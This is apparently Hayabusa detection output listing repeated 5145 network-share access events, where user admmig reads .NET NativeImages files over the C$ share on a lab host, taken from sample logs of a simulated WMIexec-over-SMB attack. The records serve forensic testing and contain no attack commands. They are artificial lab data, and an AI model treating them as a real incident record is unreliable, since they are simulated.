10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c#\c59f97903ad4de423586f3a75eb8939d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04#\f6f9e39cc765b7ceda89fc7893e0f74c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749#\7ddbc8b883fb594b4efd9f4b016a4657 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0#\54486a01e573ae88df2c9fc21771e5ef : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0#\29e4fb69d6e2ff119c3e89fe9f23ea71 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207#\e998cb40c6a3657a6090a653616ee0d2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556#\2da102d7caf13b4e082aabda839cabfd : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc#\05a925477e72821ff9fa9527061d8527 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c#\9543db50e278526c3ba397cf5c7862cb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9#\1834f24e507a831c635b80067fc7a428 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4#\f98240dfe778b4b39045d17817485b8a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9#\bb434af0d1c0846eba8f3fc7986a5cdc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\b59fee046dfa048ec5f5180dc88f835d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f#\07b01287acdaf4ef356c3918db535afd : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591#\a45750f13b28bdd0fb2adff38d6cd46f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439#\fdcc95e5c05a2fec4f9c33b7e325ccd8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC\999abcb4ea322b606c8f211d12ccb5a0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4#\f5bca9052007da4e51412dc152a52942 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884#\26a1a0abca839c13b1337a076531d7a2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719#\d0b3dad21720f265098f1e94984349f8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4#\3e37b5062bf0419283b3384af5deb445 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f#\7d512c9625a371ff23fac5628a0e68f9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602#\6423a4306ce0876f0093a7f421bb7e5a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797#\8780975ab811e02b5246582c27ea6cda : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1#\64783b930c916ed9a5041885582dd1f1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837#\fa70f9411efd4c4e624a68d30b61b1b7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5#\129a7094f09543b72571da3208c88188 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3#\86d7c67af3a964bb8d312cffb20064f4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137# : IP Address: 
